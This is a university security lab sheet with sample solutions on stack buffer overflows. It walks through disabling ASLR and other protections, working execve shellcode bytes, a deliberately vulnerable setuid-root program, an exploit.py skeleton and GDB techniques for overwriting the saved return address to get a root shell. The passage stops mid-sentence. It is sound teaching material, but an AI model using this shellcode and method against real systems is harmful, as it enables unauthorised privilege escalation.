CITS3007 lab 5 (week 6) – Buffer overflows – solutions
It’s recommended you complete this lab in pairs, if possible, and discuss your results with your partner.
The objective of this lab is to gain insight into
and see how they can be exploited. You will be given a
setuid
program with a buffer overflow vulnerability, and
your task is to develop a scheme to exploit the vulnerability and gain
root privileges.
Completing this lab requires you to have root access to the Linux kernel of the VM (or other machine) you’re running on. Otherwise, the command
sudo sysctl -w kernel.randomize_va_space=0
(in section 1.1, Turning off countermeasures) will fail. Furthermore, the shellcode used in this lab contains machine-code instructions specific to the x86-64 architecture.
Consequently, you will not be able to complete the lab using any of the following methods:
The GitPod environment does not give you root access to the kernel; while using GitPod, you are running within a security-restricted Docker container within a VM, and will be unable to change the way the kernel is running.
If you are using a VM with some architecture other than x86-64 (for instance, ARM64): exercises that involve injecting shellcode will only work on the x86-64 platform, because the machine instructions in the shellcode are specific to the x86-64 instructions contained in the shellcode. If you normally use a VM with some other architecture, then to complete shellcode exercises, you will have to switch to a VM that uses an x86-64 architecture.
The preferred way of completing this lab is by using Vagrant (as outlined in Lab 1) to run the standard CITS3007 development environment image from VirtualBox. Within that VM, you have root access to the kernel, and all commands should complete successfully. If you use some other method, the commands might work, but it’s not guaranteed.
Modern operating systems implement several security mechanisms to make buffer overflow attacks more difficult. To simplify our attacks, we need to disable them first. It’s worth understanding what these protections are, because even though they are enabled in (for instance) modern Linux systems, embedded systems (and some other cut-down or minimal operating systems) may still be vulnerable.
Ubuntu and several other Linux-based systems use address space randomization to randomize the starting address of heap and stack. This makes guessing the exact addresses difficult. This feature can be disabled by running the following command in the CITS3007 development environment:
$ sudo sysctl -w kernel.randomize_va_space=0
This information isn’t essential to the lab, but may be helpful in understanding what’s going on here.
The sysctl
command (documented at man 8 sysctl
) alters the parameters
of a running Linux kernel. (The sysctl
command should not
be confused with the annoyingly similarly named systemctl
command, which has to do with starting and stopping daemon programs on a
system.)
The current value of the randomize_va_space
(“randomize
virtual address space”) kernel parameter can be displayed by running the
command:
$ cat /proc/sys/kernel/randomize_va_space
The result is a number, 0, 1 or 2, with the following meanings:
mmap()
, VDSO and heap are randomized.brk()
is also
randomized.(The brk()
system call, documented at man 2 brk
, adjusts the size of
the heap; it’s one of the system calls typically used by
malloc
to allocate memory on the heap.)
We use the sysctl
command to set this parameter to
0.
/bin/sh
In recent versions of Ubuntu OS, /bin/sh
is a symbolic
link pointing to the /bin/dash
shell: run
ls -al /bin/sh
to see this.
The Dash program (as well as Bash) implements a countermeasure that prevents it from being executed in a setuid process. If the shell detects that the effective user ID differs from the actual user ID (see the previous lab), it will immediately change the effective user ID back to the real user ID, essentially dropping the privilege.
For these exercises, our victim program is a setuid
program, and our attack relies on running /bin/sh
, so the
countermeasure in /bin/dash
makes our attack more
difficult. Therefore, we will link /bin/sh
to
zsh
instead, a shell which lacks such protection (though
with more effort, the countermeasure in /bin/dash
can be
defeated – you might like to try doing so as a challenge task). Inside
the development environment VM, install the zsh
package
with the command
sudo apt-get update && sudo apt-get install -y zsh
,
then run the following command to link /bin/sh
to
zsh
:
$ sudo ln -sf /bin/zsh /bin/sh
You can confirm that you’ve done this correctly by running the command:
$ sh --version
If all is working as expected, it should display:
zsh 5.8 (x86_64-ubuntu-linux-gnu)
When the program runs, the memory segment containing the stack can be
marked non-executable. This feature can be turned off during
compilation, by passing the option “-z execstack
” to
gcc
. This option is passed onto the linker,
ld
, and marks the output binary as requiring an
executable stack.
This option is documented in man ld
, and we will discuss
it further when compiling our programs.
The GCC compiler can include code in a compiled program which inserts stack canaries in the stack frames of a running program, and before returning from a function, checks that the canary is unaltered.
A RedHat article on compiler stack
protection flags outlines the flags which enable stack canaries in
GCC; we will use the -fno-stack-protector
flag to ensure
they’re disabled. (Further documentation on these options is available
in the GCC
manual.) We discuss this option further when compiling our
programs.
Shellcode is a small portion of code that launches a shell, and is widely used in code injection attacks. The aim is to inject code into the running process that will allow us to exploit the system. In the buffer overflow attack we launch in this lab, we’ll write that code – which is just a sequence of bytes – into a location on the stack, and try to convince the target program to execute it.
Represented in C, a piece of shellcode might look like the following:
// shellcode.c
#include <stdio.h>
int main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
Read about the Linux execve
system call by typing man execve
;
it allows us to execute a program from C code. The name
array is effectively a list of pointers-to-char
, with a
NULL
pointer used to mark the end of the list.
However, we can’t straightforwardly use GCC to obtain our shellcode.
Recall that shellcode is a small sequence of bytes that we want
to inject into a target process. Try saving the above code as
shellcode.c
, and compile it with
make shellcode.o shellcode
. Examine the size of the
compiled program with
$ du -sk shellcode
and you will see that the compiled binary is about 20 kilobytes – far
too big and unwieldy for our purposes. (Once preprocessing is done on
the C code with cpp
, and all header files and their
definitions are included, the resulting code is a lot bigger than the 9
lines above would suggest. Read here
about one user’s attempts to get the smallest possible “Hello world”
program using GCC.)
Instead, the easiest way to construct shellcode is to write it in assembly language.1 The Intel 32-bit assembly code equivalent for the above C code would be something like the following (which you are not required to understand, but is presented here for interest):
; Store the command on stack
xor eax, eax
push eax
push "//sh"
push "/bin"
mov ebx, esp ; ebx --> "/bin//sh": execve()'s 1st argument
; Construct the argument array argv[]
push eax ; argv[1] = 0
push ebx ; argv[0] --> "/bin//sh"
mov ecx, esp ; ecx --> argv[]: execve()'s 2nd argument
; For environment variable
xor edx, edx ; edx = 0: execve()'s 3rd argument
; Invoke execve()
xor eax, eax ;
mov al, 0x0b ; execve()'s system call number
int 0x80
A brief explanation of the code (again, you’re not required to understand this in detail) is:
The "/sh"
and "/bin"
arguments are
pushed onto the stack (lines 1–5)
We need to pass three arguments to execve()
via the
ebx
, ecx
and edx
registers,2 respectively. The majority of the
shellcode basically constructs the content for these three
arguments.
The code in lines 17–19 is where we make the execve
system call – that is, we request a service from the kernel. The kernel
expects us to put a number identifying the system call we’re after (in
this case, execve
) into the a1
register, and
then notify the kernel by invoking an “interrupt”.
So, we need to know what the system call number for
execve
is – it is 0x0b
. (A list of all the
system calls and their numbers are found in a Linux header called
unistd_32.h
, usually found at
/usr/include/x86_64-linux-gnu/asm/unistd_32.h
. On Ubuntu,
this file will only exist if you’ve installed the package
linux-libc-dev
.)
We set al
to 0x0b
(al
represents the lower 8 bits of the eax
register), and then
execute the instruction “int 0x80"
.
The int
instruction generates a call to an interrupt
handler – a bit like an exception handler – and the
0x80
in int 0x80
identifies a specific bit of
kernel handler code which exists to handle system calls.
That handler will look in register a1
(part of the
eax
register) to find out what system call we want to
execute, and in registers ebx
, ecx
and
edx
for the arguments to that system call.
If you’re interested in further details on programming in x86
assembly, this guide
from the University of Virginia gives more details, such as how the
push
instruction works with the hardware-supported call
stack.
Another useful reference is the Wikibook on x86 Assembly.
We won’t do it in this lab, but the assembly code above can be
assembled using nasm
, an
assembler for the x86 CPU architecture. nasm
would compile
the above assembly into an object file (called, say,
sploit.o
), and that resulting object file contains the
exact sequence of bytes we need to insert in order to invoke
/bin/sh
. The following table is an extract from a compiled
object file produced by nasm
,3 and
shows that just 26 bytes (hex 0x1a
) are needed – these 26
bytes will have the same effect as the 20KB executable compiled from
shellcode.c
. The leftmost column shows offsets in hex, the
second column the exact byte values we want, and the last column the
corresponding assembly code:
off bytes assembly code
---------------------------------------------------
0: 31 c0 xor eax,eax
2: 50 push eax
3: 68 2f 2f 73 68 push 0x68732f2f
8: 68 2f 62 69 6e push 0x6e69622f
d: 89 e3 mov ebx,esp
f: 50 push eax
10: 53 push ebx
11: 89 e1 mov ecx,esp
13: 31 d2 xor edx,edx
15: 31 c0 xor eax,eax
17: b0 0b mov al,0xb
19: cd 80 int 0x80
Download the file bufoverflow-code.zip
into the VM (you can use the command
wget https://cits3007.github.io/labs/bufoverflow-code.zip
)
and unzip it.
cd
into the shellcode
directory, and take a
look at call_shellcode.c
(reproduced below):
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
// Binary code for setuid(0)
// 64-bit: "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"
// 32-bit: "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"
const char shellcode[] =
#if __x86_64__
"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
#else
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
"\xd2\x31\xc0\xb0\x0b\xcd\x80"
#endif
;
int main(int argc, char **argv)
{
char code[500];
strcpy(code, shellcode);
int (*func)() = (int(*)())code;
func();
return 1;
}
The purpose of this program is to demonstrate that our shellcode
byte-sequence does indeed invoke the shell /bin/sh
.
The byte sequences are stored in the array shellcode
–
observe that the 32-bit version starts with “\x31\xc0\x50
”,
which is the byte sequence we get from compiling our assembly code.
What about line 27? The syntax C uses for this is unfortunately a bit
obscure – but the gist of it is that we are saying “Declare
func
to be a pointer to some function (i.e., a
blob of executable code sitting in memory), and point it at the address
of the array code
”. Usually, the bytes sitting in
code
would not be executable, because they are
part of the call stack; but in our Makefile we pass the option
“-z execstack
” to GCC, which says to make the stack memory
segment executable. Line 29 then invokes that function pointer, just as
if it were a normal function, and that will execute the code.
Discuss with your lab partner what is happening here; ask the lab facilitator for an explanation if you’re not sure.
We won’t need to use function pointers elsewhere in the unit, but they do come in handy when trying to exploit or reverse engineer exiting binaries.
The exact details of what we are doing is as follows.
Line 27 declares func
as a pointer to a
function, and points it at the start of the code
buffer. (We’re allowed to do this, because when we use the variable
code
, it “decays” from being a char
array into
a char *
. And char *
is a sort of “universal
type” in C – the char *
type gives us a way of viewing or
writing raw memory, and it’s legal for us to then convert from
char *
to another pointer type, such as a function
pointer.)
We cast the address of code
into the type we want by
putting (int(*)())
in front of it; that says the type to
convert to is “pointer to a function which takes no arguments and
returns an int
”. (Is that obvious from the declaration?
Probably not. Function pointer declarations in C are rather cryptic, and
have to be read “from
the inside out”. Alternatively, as a shortcut, you can paste a
declaration into https://cdecl.org, and it will attempt to give you an
“English translation” of what the declaration means.)
So: when the function pointer func
is invoked (line 29),
the instructions sitting in code
will be executed.
The code above includes two copies of the shellcode – one is 32-bit
and the other is 64-bit. When we compile the program using the -m32
flag, the 32-bit version will be used; without this flag, the 64-bit
version will be used. Using the provided Makefile, you can compile the
code by typing make
. Two binaries will be created,
a32.out
(32-bit) and a64.out
(64-bit). Run
them and describe your observations. As noted above, the compilation
uses the execstack
option, which allows code to be executed
from the stack; without this option, the program will fail. Try deleting
the flags “-z execstack
” from the makefile and compile and
run the programs again – what happens?
Sample solutions
If the “-z execstack
” options are removed, then running
the compiled programs – which try to execute instructions in a
non-executable segment of memory – results in a segmentation fault, and
the program aborts.
The vulnerable program used in this lab is called
stack.c
, which is in the code
folder from the
zip file. This program has a buffer overflow vulnerability, and your job
is to exploit this vulnerability and gain root privileges. The essential
parts are shown below (some inessential functions have been
omitted):
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 100
#endif
int bof(char *str) {
char buffer[BUF_SIZE];
// The following statement has a buffer overflow problem
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv) {
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
if (!badfile) {
perror("Opening badfile"); exit(1);
}
int length = fread(str, sizeof(char), 517, badfile);
printf("Input size: %d\n", length);
bof(str);
fprintf(stdout, "==== Returned Properly ====\n");
return 1;
}
The above program has a buffer overflow vulnerability. It first reads
an input from a file called badfile
, and then passes this
input to another buffer in the function bof()
. The original
input can have a maximum length of 517 bytes, but the buffer in
bof()
is only BUF_SIZE
bytes long, which is
less than 517. Because strcpy()
does not check boundaries,
buffer overflow will occur.
Since this program is a root-owned setuid
program, if a
normal user is able to exploit this vulnerability, the user may be able
to get a root shell. Note that the program gets its input from a file
called badfile
, which is under users’ control. Your
objective is to create the contents for badfile
, such that
when the vulnerable program copies the contents into its buffer, a root
shell can be spawned.
To compile the above vulnerable program, do not forget to turn off
the stack canaries and the non-executable stack protections using the
-fno-stack-protector
and “-z execstack
”
options.
After compilation, we need to make the program a root-owned
setuid
program. We can achieve this by first changing the
ownership of the program to root, and then changing the permission to
4755
to enable the setuid
bit:
$ gcc -DBUF_SIZE=100 -m32 -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack
It should be noted that changing ownership must be done before
turning on the setuid
bit, because ownership change will
cause the setuid
bit to be turned off.
The compilation and setup commands are already included in Makefile,
so we just need to type make
to execute those commands. The
variables L1, …, L4 are set in Makefile; they will be used during the
compilation.
Typing make
should result in output like the
following:
gcc -DBUF_SIZE=100 -z execstack -fno-stack-protector -m32 -o stack-L1 stack.c
gcc -DBUF_SIZE=100 -z execstack -fno-stack-protector -m32 -g -o stack-L1-dbg stack.c
sudo chown root stack-L1 && sudo chmod 4755 stack-L1
gcc -DBUF_SIZE=160 -z execstack -fno-stack-protector -m32 -o stack-L2 stack.c
gcc -DBUF_SIZE=160 -z execstack -fno-stack-protector -m32 -g -o stack-L2-dbg stack.c
sudo chown root stack-L2 && sudo chmod 4755 stack-L2
gcc -DBUF_SIZE=200 -z execstack -fno-stack-protector -o stack-L3 stack.c
gcc -DBUF_SIZE=200 -z execstack -fno-stack-protector -g -o stack-L3-dbg stack.c
sudo chown root stack-L3 && sudo chmod 4755 stack-L3
gcc -DBUF_SIZE=10 -z execstack -fno-stack-protector -o stack-L4 stack.c
gcc -DBUF_SIZE=10 -z execstack -fno-stack-protector -g -o stack-L4-dbg stack.c
sudo chown root stack-L4 && sudo chmod 4755 stack-L4
The following executables should get built:
stack-L1 stack-L1-dbg
stack-L2 stack-L2-dbg
stack-L3 stack-L3-dbg
stack-L4 stack-L4-dbg
The level 1 (“L1”) programs should be the easiest to exploit, and are the ones we use in this lab; and for each level, the ones with debugging symbols enabled (“-dbg”) should be very straightforward to exploit.
If you are able to successfully exploit the stack-L1-dbg
and stack-L1
programs, then for a challenge, you might like
to try exploiting the L2, L3 and L4 programs.
To exploit the buffer-overflow vulnerability in the target program, the most important thing to know is the distance between the buffer’s starting position and the place where the return-address is stored. We will use a debugging method to find it out. Since we have the source code of the target program, we can compile it with the debugging flag turned on. That will make it more convenient to debug.
We will add the -g
flag to the gcc
command,
so debugging information is added to the binary. If you run
make
, the debugging version is already created. We will use
GDB to debug stack-L1-dbg
. We need to create a file called
badfile
before running the program.
$ touch badfile # Create an empty badfile
$ gdb stack-L1-dbg # start gdb
When you run a program in GDB, ASLR address randomization gets
temporarily turned off. (If you already disabled ASLR using the
systemctl
command, as described under “Turning off countermeasures”, then obviously
this won’t make any difference. But on systems that do have
ASLR enabled, this explains why the address you see in GDB can differ
from the addresses found in a normally-running program.)
It’s not necessary for you to know the details of how this is done;
but if you’re interested, take a look at man 2 personality
.
On Linux, calling personality(ADDR_NO_RANDOMIZE)
changes
how the stack and heap will be laid out in memory. Then, one can call fork()
and one of the exec
functions to launch a new process in which ASLR is disabled.
Within GDB, run the commands:
(gdb) b bof
(gdb) run
(gdb) next
(gdb) print $ebp
(gdb) print &buffer
(gdb) quit
This will set a break point at function bof()
and run
the program. We stop at the bof
function and step to the
strcpy
call.
The ebp
register is used at runtime to point to the
“start” (high-memory end) of the current stack frame. When GDB stops
“inside” the bof()
function, it actually stops
before the ebp
register is set to point to the
current stack frame, so if we print out the value of ebp here, we will
get the caller’s ebp
value. We need to use
next
to execute a few instructions and stop after the
ebp
register is modified to point to the stack frame of the
bof()
function.
It should be noted that the frame pointer value obtained from GDB is different from that during the actual execution (without using GDB). This is because GDB has pushed some environment data into the stack before running the debugged program. When the program runs directly without using GDB, the stack does not have that data, so the actual frame pointer value will be larger. You should keep this in mind when constructing your payload.
A register
is a quickly accessible location available to a CPU. You can think of it
as being a size_t
cell of memory hanging directly off the
CPU. (Often, the CPU will also provide ways of referring to just
part of a register, as well. For instance, there may be a name
by which you can refer to just the 8 lowest (char
-sized)
bits of some register.) Instead of having memory addresses,
like locations in RAM, they have names – for instance,
eax
, ebx
, ecx
, edx
,
and so on. As a program executes, data from RAM will often be loaded
into the processor’s registers so it can be operated on.
On 32-bit Intel machines, some of the registers have special purposes.
The eip
register: this is the “Extended Instruction
Pointer” register (or just “Instruction Pointer”) – it keeps track of
what instruction should be executed next.
When a function is called – and a new stack frame gets pushed onto
the call stack – the value of the eip
register needs to be
saved somewhere in the stack frame, so that when the current
function returns, we know what instruction to execute
afterwards.
The ebp
register: this is used to hold the “base
pointer” for the current stack frame. As the stack frame is being set
up, ebp
will be used to store a “start” or “base” point for
the stack frame, and the location of variables will be calculated
relative to the value of ebp
.
On GCC, it’s possible to use the function
__builtin_frame_address()
to get the value of the
ebp
register (see https://gcc.gnu.org/onlinedocs/gcc/Return-Address.html).
The esp
register: the “current stack frame” pointer.
This points to the spot in the current stack frame where new local
variables should be inserted. As a stack frame is being set up, this
starts off being equal to the ebp
register. As memory is
allocated for local variables, the esp
register will get
decremented.
(Diagram of x86 registers from University of Virginia cs216 x86 Assembly Guide by David Evans.)
To exploit the buffer overflow vulnerability in the target program,
we need to prepare a payload, and save it inside badfile
.
We will use a Python program to do that. (You won’t need any extensive
knowledge of Python for this lab, since you’ll just be making minor
alterations to an existing script. But if you are not familiar with
Python and would like a tutorial on it, Google
provides a helpful one.) We provide a skeleton program called
exploit.py
, which is included in the lab zip file. The code
is incomplete, and you will need to replace some of the essential values
in the code (marked with an XXX
):
#!/usr/bin/python3
import sys
# XXX - replace the content with the actual shellcode
shellcode= (
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
).encode('latin-1')
# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))
##################################################################
# Put the shellcode somewhere in the payload
start = 0 # XXX - change this number
content[start:start + len(shellcode)] = shellcode
# Decide the return address value
# and put it somewhere in the payload
ret = 0x00 # XXX - change this number
offset = 0 # XXX - change this number
L = 4 # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little')
##################################################################
# Write the content to a file
with open('badfile', 'wb') as f:
f.write(content)
You will need to change the exploit.py
code to:
shellcode
just contains
do-nothing, “no-op” instructions – these are a bit like writing
semicolons without a statement in C, or pass
statements in
Python.)start
variable at line 15. This specifies at
exactly what offset in badfile
the shellcode bytes are
inserted.ret
variable at line 20 and the
offset
variable at line 21. offset
specifies a
place in badcode
where we want to insert an “address to
return to”, and ret
is that address.Running exploit.py
will generate a file
badfile
. Then run the vulnerable program
stack
.
Here is what we’re ultimately aiming for: if you manage to implement
the exploit correctly, you should be able to get a root shell by
creating badfile
and running the stack-L1
program:
$ ./exploit.py # create the badfile
$ ./stack-L1 # launch the attack by running the vulnerable program
# <---- Bingo! You’ve got a root shell!
However, working out what values to insert in our
exploit.py
script at start
, ret
and offset
will take some experimentation, which we’ll look
at in the following section. (By the way: if you do get the exploit
working – try running the command id
to confirm you are
root. If you’ve successfully become root, the id
command
will say that your userid is 0)
The following section gives some suggestions on how to identify the
values that should go in the XXX
parts of
exploit.py
.
You may want to work through that section, and then try a fairly easy
exercise – can you craft a badfile
which will give you root
access when ./stack-L1-dbg
is run?
Then try customizing the values in exploit.py
so that
you can exploit ./stack-L1
. It will require slightly
different values to ./stack-L1-dbg
. How can you find
them?
Your lab facilitator may have some hints.
It can be helpful to try and orient yourself while using GDB, and work out where different parts of the stack are. In this section, we show some commands you can run to find their locations.
It can be helpful to get an overall picture of how memory is laid out in the vulnerable program – we outline two ways of doing it.
While you have the stack-L1-dbg
program stopped at a
breakpoint in GDB, open another terminal session and ssh
into the VM so you can run ps -af | grep stack-L1-dbg
.
You should see something like the following:
$ ps -af | grep stack-L1-dbg
vagrant 1355 1340 0 02:43 pts/1 00:00:00 gdb ./stack-L1-dbg
vagrant 1357 1355 0 02:43 pts/1 00:00:00 /home/vagrant/lab04-code/code/stack-L1-dbg
vagrant 1362 1246 0 02:44 pts/0 00:00:00 grep --color=auto stack-L1-dbg
Here, the second line shows the (currently stopped)
stack-L1-dbg
process; the second column is the process
ID. If you run cat /proc/process_id/maps
(replacing process_id with the process ID of the
stack-L1-dbg
process), you should get output like the
following:
56555000-56558000 r-xp 00000000 fc:03 393228 /home/vagrant/lab04-code/code/stack-L1-dbg
56558000-56559000 r-xp 00002000 fc:03 393228 /home/vagrant/lab04-code/code/stack-L1-dbg
56559000-5655a000 rwxp 00003000 fc:03 393228 /home/vagrant/lab04-code/code/stack-L1-dbg
5655a000-5657c000 rwxp 00000000 00:00 0 [heap]
f7dd5000-f7fba000 r-xp 00000000 fc:03 1847105 /usr/lib32/libc-2.31.so
f7fba000-f7fbb000 ---p 001e5000 fc:03 1847105 /usr/lib32/libc-2.31.so
f7fbb000-f7fbd000 r-xp 001e5000 fc:03 1847105 /usr/lib32/libc-2.31.so
f7fbd000-f7fbe000 rwxp 001e7000 fc:03 1847105 /usr/lib32/libc-2.31.so
f7fbe000-f7fc1000 rwxp 00000000 00:00 0
f7fcb000-f7fcd000 rwxp 00000000 00:00 0
f7fcd000-f7fd0000 r--p 00000000 00:00 0 [vvar]
f7fd0000-f7fd1000 r-xp 00000000 00:00 0 [vdso]
f7fd1000-f7ffb000 r-xp 00000000 fc:03 1847101 /usr/lib32/ld-2.31.so
f7ffc000-f7ffd000 r-xp 0002a000 fc:03 1847101 /usr/lib32/ld-2.31.so
f7ffd000-f7ffe000 rwxp 0002b000 fc:03 1847101 /usr/lib32/ld-2.31.so
fffdd000-ffffe000 rwxp 00000000 00:00 0 [stack]
This gives you a picture of the process’s virtual memory4 – memory addresses are in the
leftmost column, with permissions for each memory segment
(e.g. read, write and
execute) in the second column. In the output above, the
actual program instructions of stack-L1-dbg
– the “text
segment” – are in the addresses 0x56555000
to
0x5655a000
(lines 1–3). Back in GDB, if you ask for the
memory address of the instructions of the main
routine, you
should get an address in that range:
(gdb) print main
$1 = {int (int, char **)} 0x565562e0 <main>
The stack is in the range of addresses from
0xfffdd000
to 0xffffe000
.
For convenience, GDB also provides another way of getting the same
information. The GDB “info proc
” command extracts
information from the /proc
filesystem automatically in much
the same way we just did manually. Typing help info proc
tells you more about the command:
(gdb) help info proc
Show /proc process information about any running process.
Specify any process id, or use the program being debugged by default.
Specify any of the following keywords for detailed info:
mappings -- list of mapped memory regions.
stat -- list a bunch of random process info.
status -- list a different bunch of random process info.
all -- list all available /proc info.
And typing info proc mappings
should display output
similar to what we got from the
cat /proc/process_id/maps
command.
A good way to start is to open the vulnerable program in GDB, put a
breakpoint within the bof
function, and then run the
program. If we’re stopped somewhere in the bof
function,
then if we issue the backtrace
command, we can get some
basic information about the stack frames currently on the stack:
(gdb) backtrace
#0 bof (str=0xffffd2e3 "\n\212\027\377\367\bRUV\001") at stack.c:17
#1 0x565563ee in dummy_function (str=0xffffd2e3 "\n\212\027\377\367\bRUV\001") at stack.c:46
#2 0x56556382 in main (argc=1, argv=0xffffd5a4) at stack.c:34
(If you see something very different – make sure you’re running GDB
against stack-L1-dbg
, and not stack-L1
. The
latter program is missing the debug symbols that have been inserted into
stack-L1-dbg
, and thus will be less easy to analyse using
GDB.)
This says there are 3 stack frames on the stack. Stack frame #2
represents our position in the main
function. We’ve just
executed an instruction sitting at location 0x56556382
in
memory,5 which corresponds to
stack.c
line 34 (i.e., the call to
dummy_function(str)
).
Similarly, stack frame #1 represents our position in
dummy_function
, and stack frame #0 is the current stack
frame.
We can get more information about a stack frame using the
info frame
command. For instance, issuing the GDB command
info frame 0
should result in output like the
following:
(gdb) info frame 0
Stack frame at 0xffffcec0:
eip = 0x565562c2 in bof (stack.c:17); saved eip = 0x565563ee
called by frame at 0xffffd2d0
source language c.
Arglist at 0xffffce3c, args: str=0xffffd2e3 "\n\212\027\377\367\bRUV\001"
Locals at 0xffffce3c, Previous frame's sp is 0xffffcec0
Saved registers:
ebx at 0xffffceb4, ebp at 0xffffceb8, eip at 0xffffcebc
This tells us:
Looking at the first line of output,
Stack frame at 0xffffcec0
:
The current stack frame, for bof
, is at location
0xffffcec0
. (The stack frames for
dummy_function
and main
, if we inspect them,
will be at higher addresses in memory. Recall that the stack grows from
high memory addresses to low ones.)
Looking at the second line of output,
eip = 0x565562c2 in bof (stack.c:17); saved eip = 0x565563ee
:
This tells us about the value of the eip
register. On
Intel processors, this is the “Extended Instruction Pointer” register –
it keeps track of what instruction is currently being executed.
eip = 0x565562c2 in bof (stack.c:17)
tells us that we’re
currently executing the instruction at location 0x565562c2
in memory, and that it corresponds to stack.c
line 17.
saved eip = 0x565563ee
tells us about the bit of the
stack frame that says what code to execute after the current function
returns. Presently, the stack frame is going to return to location
0x565563ee
– the spot in dummy_function
where
we’ve just executed the call to bof()
.
Looking at the last line of output,
eip at 0xffffcebc
:
This tells us the location we need to overwrite, if we want to jump
to somewhere other than dummy_function
.
Memory location 0xffffcebc
is the part of the current
stack frame which stores the “next instruction to execute” after
bof
returns.
Let’s examine the Instruction Pointer a little. Make sure you’re
stopped in the middle of the bof
function: issue the GDB
commands run
(this will ask you if you want to restart the
program; answer yes) and next
to get there.
Issue the GDB command print $eip
to show the current
value of the Instruction Pointer, and you should see something like the
following:
(gdb) print $eip
$8 = (void (*)()) 0x565562c2 <bof+21>
What does this mean?
(void (*)())
says that we should think of the
eip
register as holding a pointer to a function taking no
arguments and returning void.0x565562c2
is the location in memory of the address
currently being executed.<bof+21>
says it’s 21 instructions past the start
of bof
. (If you like, you can confirm this by issuing the
GDB command print bof
– that will tell you where the
first instruction in bof
is located – and checking
that it’s equal to address_in_eip − 21.Now let’s do the same for the saved eip
.
Sometimes while debugging in GDB, it’s handy to be able to hang onto some value because it will be useful to refer to it in a later step.
GDB lets us define convenience variables (see the GDB documentation on them here). These variables aren’t part of the program being debugged; they exist purely within GDB, and have no effect on the execution of the program. They’re more like a piece of GDB-specific “scratch paper” on which you might write down notes for later.
Convenience variables start with a dollar sign (“$
”).
You can set a convenience variable with a command like:
(gdb) set $myvar = 0x2020
and thereafter use the variable in any GDB command. For instance, the
following will print the value of $myvar
:
(gdb) print/x $myvar
$9 = 0x2020
(The “/x
” after the “print” command instructs GDB to
print the result in hexadecimal notation, rather than decimal, and is
useful for printing the value of pointers.)
We know the saved eip
is stored in memory location
0xffffcebc
. Let’s see where that currently points.
We’ll use GDB’s “convenience variables” to make our commands a bit
easier to read.
(gdb) set $saved_eip = 0xffffcebc
# ^ store the location for later
(gdb) print (size_t *) $saved_eip
# ^ we can tell GDB to treat $saved_eip as a pointer to size_t*
$10 = (size_t *) 0xffffcebc
(gdb) print/x (* ((size_t *) $saved_eip))
# ^ now we *dereference* the $saved_eip location,
# displaying (in hex) the address it holds.
$11 = 0x565563ee
We know it’s okay to treat $saved_eip
as a “pointer to
size_t
”, because a size_t
is big enough to
hold any address in memory.6 GDB tells us that the
current contents of $saved_eip
is 0x565563ee
–
and that is indeed the address GDB has said we’re going to jump back
to.
We can issue the command print (void (*)()) 0x565563ee
to confirm where that address is – GDB will tell us that it’s the same
as <dummy_function+62>
. (We cast it to the type
“pointer to a function taking no arguments and returning
void
”, so that GDB knows to interpret it as the address of
executable code.)
So, we’ve confirmed that the saved eip
register does
says that once the current function has finished executing, we’re to
jump back into somewhere in dummy_function
(specifically,
the 62nd instruction after the start of the function).
So, how can we overwrite the saved eip
? We’ll need to
know
buffer[BUF_SIZE]
local variable is sitting in
memory. This is where the contents of badfile
will get
written.eip
is. If we
adjust the contents of badfile
carefully, we should be able
to overwrite the saved eip
with the address of some other
function.We can get item (a) by issuing the command
print &buffer
. The output should be something like:
(gdb) print &buffer
$12 = (char (*)[100]) 0xffffce4c
So the address of the saved eip
, minus the address of
buffer
, tells us the spot in badfile
that
should contain the address of our malicious shellcode.
To start with, you might want to focus on overwriting the saved
eip
with a function of your choosing and get that working,
before trying to force execution of your shellcode.
For instance, can you overwrite the saved eip
so that
when the bof
function finishes, execution will – instead of
jumping to instruction <bof+21>
– jump to the start
of bof
again, or the start of dummy_function
?
In exploit.py
, change the value of ret
to the
location of the function you want to jump to, and change
offset
to the distance between buffer
and the
saved eip
. You can then use GDB to step through execution
of stack-L1-dbg
and confirm whether this worked.
Then, try to get your shellcode executed. In exploit.py
,
change the value of shellcode
so that it holds the
shellcode instructions to execute. You’ll then need to decide where in
buffer
your shellcode should be inserted (leaving it at 0
to start with is fine); work out what the start address of your
shellcode is going to be; and ensure that ret
contains that
address.
Sample solutions
By working through section 3.3, it should be
possible to work out how the bof
stack frame is laid out in
memory for the stack-L1-dbg
program.
When bof
is executing, the stack frames in
stack-L1-dbg
look like this:
When the bof
function is called:
dummy_function
) pushes the argument to
bof()
(namely, str
) onto the stack.call
instruction to invoke
bof()
. The address of the instruction after the
call
instruction is pushed onto the stack – this is the
“saved eip
”.ebp
register is pushed onto
the stack – this is the “saved ebp
” value, and marks the
start of a stack frame.buffer
), from addresses ebp-108
to
ebp-4
.So we need to overwrite address ebp+4 (the saved eip
),
and store in it the address of our shellcode.
When we are working with the non-debug version of the program,
stack-L1
, the addresses of the buffer and saved registers
will be slightly different. But it’s still possible to work them out;
there are several ways.
Since we have access to the source code of the setuid version
(it’s the same as the source code for the -dbg version); and since, if
there’s no ASLR, functions should end up in exactly the same address
each time: that means we can make a copy of the code, add “printf” calls
to print out things like the location of the str
argument
to bof
(near the high memory end of the stack frame) and
the location of buffer
.
For instance, we can add the following code to bof
:
("&buffer: %p\n", &buffer);
printf("&str: %p\n", &str); printf
and from those, work out where the saved eip
must
be.
Even though stack-L1
has no debugging information
added to it, you can actually still run GDB on it. Run the
following commands:
(gdb) layout asm # switch to displaying assembly, since there's no C source
(gdb) break bof # set a breakpoint at bof
(gdb) run # run til the breakpoint
and you’ll stop at the start of bof
. You can still run
the backtrace
and info frame 0
commands to
